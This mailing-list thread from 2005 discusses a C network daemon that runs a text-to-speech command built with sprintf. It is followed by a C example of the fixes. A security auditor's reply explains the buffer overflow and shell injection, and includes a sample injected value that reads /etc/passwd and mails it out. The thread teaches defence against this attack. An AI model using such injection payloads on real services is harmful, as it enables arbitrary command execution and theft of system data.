Yep, that's a good point, that I haven't realized. The security stuff is very very important.
I have to change the code to be able to manage these problems. This is the next step.

Thanks for your advice ;-)

Sergio Cuellar Valdes

On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <[EMAIL PROTECTED]> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cuéllar Valdés wrote:
> > Marc, thanks that was the problem !!!
> >
> > sprintf(message, "say -s 4 -a \"%s\"", buffer);  < this was the big
> > big big mistake
>
>   It certainly was.
>
> > I added the whole path to the instructions:
> >
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> >
> > Thanks to all of you who helped me !! :-)
>
>   You daemonize. You open a socket. You read input from that
>  socket - carefully avoiding buffer overflows - then you run the
>  command:
>
>     /usr/local/bin/say -s 4 -a "the text you read"
>
>   Firstly you don't avoid a simple buffer overflow. Although
>  you have two buffers, 'buffer' for receiving the message from
>  the network and 'message' for running the command are both the
>  same size you don't account for the extra characters when you're
>  copying:
>
>     sprintf(message, "say -s 4 -a \"%s\"", buffer);
>
>   At least change that to:
>
>     snprintf(message, sizeof(message), "say -s 4 -a \"%s\"", buffer);
>
>   Secondly, and this is the biggie, you don't quote or process the
>  characters which are read from the network.
>
>   Consider what would happen if a malicious user sent this:
>
>     "; cat /etc/passwd | mail [EMAIL PROTECTED] ; echo "
>
>   You would run this command:
>
>     /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
>
>   Effectively you're allowing any user who can connect to your server
>  to execute arbitrary commands. If this is started by init you're likely
>  running as root too.
>
>   Check that the characters you read from the network are only
>  [a-zA-Z ] and you're probably OK.
>
> Steve
> --
> # The Debian Security Audit Project.
> http://www.debian.org/security/audit
>
>

--
"My hope shall guide me
Through the days without you
And love shall carry me
When the pain breaks the hope"
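
The two fixes recommended in the quoted reply (a bounded `snprintf` and an `[a-zA-Z ]` character check), as an added C example that is not code from the thread. The names `text_is_safe`, `build_say_command` and `run_say` are hypothetical, and the `execl` variant goes one step beyond the reply's advice by not involving a shell at all.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define SAY_PATH "/usr/local/bin/say"   /* path used in the thread */

/* Accept only the characters suggested in the thread: [a-zA-Z ]. */
int text_is_safe(const char *s)
{
    for (; *s; s++) {
        int letter = (*s >= 'a' && *s <= 'z') || (*s >= 'A' && *s <= 'Z');
        if (!letter && *s != ' ')
            return 0;
    }
    return 1;
}

/* Bounded build of the command string. Returns 0 on success, -1 if the
 * text is rejected or the result would not fit in out[outlen]. */
int build_say_command(char *out, size_t outlen, const char *text)
{
    if (!text_is_safe(text))
        return -1;
    int n = snprintf(out, outlen, SAY_PATH " -s 4 -a \"%s\"", text);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Shell-free variant (an addition beyond the thread): the text is passed as
 * one argv element, so no shell parses it. Returns exit status or -1. */
int run_say(const char *text)
{
    int status;
    pid_t pid;
    if (!text_is_safe(text) || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execl(SAY_PATH, "say", "-s", "4", "-a", text, (char *)NULL);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[64];                        /* input below is constructed */
    printf("%d\n", build_say_command(cmd, sizeof cmd, "\"; cat /etc/passwd ; echo \""));
    return 0;
}
```

Checking the `snprintf` return value matters as much as passing the size: a silently truncated command is still executed, just with different text than was validated.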